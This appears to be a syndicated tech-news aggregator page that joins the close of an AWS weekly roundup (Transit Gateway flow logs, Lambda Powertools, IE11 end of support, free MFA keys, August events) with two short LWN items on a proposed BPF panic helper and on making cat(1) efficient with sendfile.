Amazon VPC Flow Logs for Transit Gateway is a new capability that allows customers to gain deeper visibility and insights into network traffic on AWS Transit Gateway. With this feature, Transit Gateway can export detailed information, such as source/destination IPs, ports, protocols, traffic counters, timestamps, and various metadata for all of the network flow traversing through the Transit Gateway. To learn more, read Introducing VPC Flow Logs for AWS Transit Gateway and Logging network traffic using Transit Gateway Flow Logs.

AWS Lambda Powertools for TypeScript is an open-source developer library that can help you incorporate Well-Architected Serverless best practices focusing on three observability features: distributed tracing (Tracer), structured logging (Logger), and asynchronous business and application metrics (Metrics). Powertools is also available in the Python and Java programming languages. To learn more, see the blog post Simplifying serverless best practices with AWS Lambda Powertools for TypeScript. You can submit feedback, ideas, and issues directly on our GitHub project.

AWS re:Post is a vibrant Q&A community that helps you become even more successful on AWS. You can now add a profile picture or avatar to your account and add inline images such as diagrams or screenshots to support your questions or answers. Add your profile picture and start using inline images today!

For a full list of AWS announcements, be sure to keep an eye on the What’s New at AWS page.

Other AWS News
Here are some news, blog posts, and video series for you to know:

In July 2021, we notified users about the end of support for Internet Explorer 11, which is now approaching on July 31, 2022. The browser will no longer be supported in the AWS Management Console, web-based services such as Amazon QuickSight, Amazon Chime, Amazon Honeycode, and some other AWS websites. After that date, we can no longer guarantee that the features and webpages will function properly on IE 11. For more information, please visit AWS Supported Browsers.

In fall 2021, we began offering a free multi-factor authentication (MFA) security key to AWS account owners in the United States. Now eligible customers can order the free MFA security key through the ordering portal in the AWS Management Console. At this time, only U.S.-based AWS account root users who have spent more than $100 each month over the past 3 months are eligible to place an order. For more information, see our Free MFA Security Key page.

Amazon’s Machine Learning University expands with MLU Explains, a public website containing visual essays that incorporate fun animations and scrollytelling to explain machine learning concepts in an accessible manner. The following animation teaches the concepts of data splitting in machine learning using an example model that attempts to determine whether animals are cats or dogs. To learn more, read the Amazon Science blog post.

This is My Architecture is a video series that showcases innovative architectural solutions on the AWS Cloud by customers and partners. In June and July, over 15 episodes were updated, including GoDaddy, Riot Games, and Hudl. Each episode examines the most interesting and technically creative elements of each cloud architecture.

Upcoming AWS Events in August
Check your calendars and sign up for these AWS events:

AWS SummitRegistration is open for upcoming in-person AWS Summits that might be close to you in August: Sao Paulo (August 3–4), Anaheim (August 18), Taiwan (August 10–11), Chicago (August 28), and Canberra (August 31).

AWS Innovate – Data Edition – On August 23, learn how a modern data strategy can support your present and future use cases, including steps to build an end-to-end data solution to store and access, analyze and visualize, and even predict.

AWS Innovate – For Every Application Edition – On August 25, learn about a wide selection of AWS solutions across compute, storage, networking, hybrid, and edge infrastructure to help you scale application resources seamlessly and optimally.

Although these two Innovate events will be held in Asia Pacific and Japan time zones, you can view on-demand videos for two months following your registration.

If you’re interested in learning modern development practices live in New York City, I recommend joining AWS Solutions Day on August 10. I love advanced topics to focus on building new web apps with Java, JavaScript, TypeScript, and GraphQL.

If you’re interested in learning AWS fundamentals and preparing for AWS Certifications, there are several virtual events in August, such as AWS Cloud Practitioner Essentials Day, AWS Technical Essentials Day, and Exam Readiness for AWS Certificates.

That’s all for this week. Check back next Monday for another Week in Review!

— Channy

This post is part of our Week in Review series. Check back each week for a quick roundup of interesting news and announcements from AWS!

[$] The BPF panic function

Post Syndicated from original https://lwn.net/Articles/901284/

One of the key selling points of the BPF subsystem is that loading a BPF
program is safe: the BPF verifier ensures that the program cannot hurt the
kernel before allowing the load to occur. That guarantee is perhaps
losing some of its force as more
capabilities are made available to BPF programs but, even so, it may be a
bit surprising to see this
proposal from Artem Savkov
adding a BPF helper that is explicitly designed to
crash the system. If this patch set is merged in something resembling its
current form, it will be the harbinger of a new era where BPF programs are,
in some situations at least, allowed to be overtly destructive.

Conill: How efficient can cat(1) be?

Post Syndicated from original https://lwn.net/Articles/901707/

Ariadne Conill explores
ways to make the Unix cat utility more efficient on
Linux.

The first possible option is the venerable sendfile syscall, which
was originally added to improve the file serving performance of web
servers. Originally, sendfile required the destination file
descriptor to be a socket, but this restriction was removed in
Linux 2.6.33. Unfortunately, sendfile is not perfect: because it
only supports file descriptors which can be memory mapped, we must
use a different strategy when using copying from stdin.

The collective thoughts of the interwebz

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close